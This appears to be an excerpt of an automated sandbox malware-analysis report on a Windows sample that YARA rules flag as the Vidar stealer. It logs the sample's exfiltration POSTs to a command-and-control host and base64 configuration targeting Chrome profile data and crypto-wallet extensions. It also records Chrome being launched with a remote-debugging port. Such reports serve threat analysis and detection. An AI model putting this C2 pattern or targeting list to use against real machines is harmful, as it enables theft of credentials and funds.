2025-03-19 13:00:14 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:14 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii:
  3a
  1|1|1|0|5db94ad8854c4b4b48c7c8e4f6bb3688|1|1|1|0|0|50000|1
  0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.10  49684        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:00:15 UTC  271                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----djecjectjectjectri58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:15 UTC  331                OUT        Data Ascii:
------djecjectjectjectri58
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------djecjectjectjectri58
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------djecjectjectjectri58
Cont
2025-03-19 13:00:15 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:15 UTC  2192               IN
                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.10  49685        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:00:17 UTC  271                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----hvkf3eu3o8gln7qqqq1d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:17 UTC  331                OUT        Data Ascii:
------hvkf3eu3o8gln7qqqq1d
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------hvkf3eu3o8gln7qqqq1d
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------hvkf3eu3o8gln7qqqq1d
Cont
2025-03-19 13:00:17 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:17 UTC  5837               IN
                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.10  49686        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:00:20 UTC  271                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----as268yukfusrqq9rim79
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:20 UTC  332                OUT        Data Ascii:
------as268yukfusrqq9rim79
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------as268yukfusrqq9rim79
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------as268yukfusrqq9rim79
Cont
2025-03-19 13:00:20 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:20 UTC  119                IN
                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.10  49694        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:00:27 UTC  272                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ba168gln7qieuaaiwbi5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 5721
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:27 UTC  5721               OUT        Data Ascii:
------ba168gln7qieuaaiwbi5
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------ba168gln7qieuaaiwbi5
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------ba168gln7qieuaaiwbi5
Cont
2025-03-19 13:00:28 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:28 UTC  12                 IN         Data Ascii:
2
ok
0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.10  49699        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:02:15 UTC  271                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----phlnglxt268gvasr1djw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:02:15 UTC  489                OUT        Data Ascii:
------phlnglxt268gvasr1djw
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------phlnglxt268gvasr1djw
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------phlnglxt268gvasr1djw
Cont
2025-03-19 13:02:16 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:02:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:02:16 UTC  12                 IN         Data Ascii:
2
ok
0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.10  49700        78.47.63.132    443               6980  C:\Users\user\Desktop\random(2).exe
Timestamp                Bytes transferred  Direction  Data
2025-03-19 13:02:16 UTC  274                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5xbaimgln7qim7yctjwl
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:02:16 UTC  16355              OUT        Data Ascii:
------5xbaimgln7qim7yctjwl
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------5xbaimgln7qim7yctjwl
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------5xbaimgln7qim7yctjwl
Cont
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-19 13:02:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:18 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49701 | 78.47.63.132 | 443 | 6980 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:02:17 UTC | 273 | OUT | POST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----y5fctr1d2dtrqqimgvas
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 55081
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
2025-03-19 13:02:17 UTC | 16355 | OUT | Data Ascii:
------y5fctr1d2dtrqqimgvas
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------y5fctr1d2dtrqqimgvas
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------y5fctr1d2dtrqqimgvas
Cont
2025-03-19 13:02:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:18 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
2025-03-19 13:02:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49702 | 78.47.63.132 | 443 | 6980 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:02:19 UTC | 274 | OUT | POST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----7g4eukfkxlnyu3wl6pzu
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 186149
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
2025-03-19 13:02:19 UTC | 16355 | OUT | Data Ascii:
------7g4eukfkxlnyu3wl6pzu
Content-Disposition: form-data; name="token"

5db94ad8854c4b4b48c7c8e4f6bb3688
------7g4eukfkxlnyu3wl6pzu
Content-Disposition: form-data; name="build_id"

80621af4947f6f7800865a5c80d8f329
------7g4eukfkxlnyu3wl6pzu
Cont
2025-03-19 13:02:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:20 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 49710 | 142.250.186.164 | 443 | 8048 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:02:26 UTC | 613 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC | 1303 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: -1
                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JMMGqt76lTKzUCsZRQZRJw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49711 | 142.250.186.164 | 443 | 8048 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:02:26 UTC | 516 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC | 1055 | IN | HTTP/1.1 200 OK
                                                                                                                                          Version: 736403927
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49713 | 142.250.186.164 | 443 | 8048 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:02:26 UTC | 393 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Sec-Fetch-Storage-Access: active
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC | 970 | IN | HTTP/1.1 200 OK
                                                                                                                                          Version: 736403927
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
2025-03-19 13:02:26 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-03-19 13:02:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:00:07
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Users\user\Desktop\random(2).exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\random(2).exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'822'720 bytes
                                                                                                                                          MD5 hash:5E941E7C271E85093CB8344FB7CAB50B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:09:02:19
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:09:02:21
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:09:02:26
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
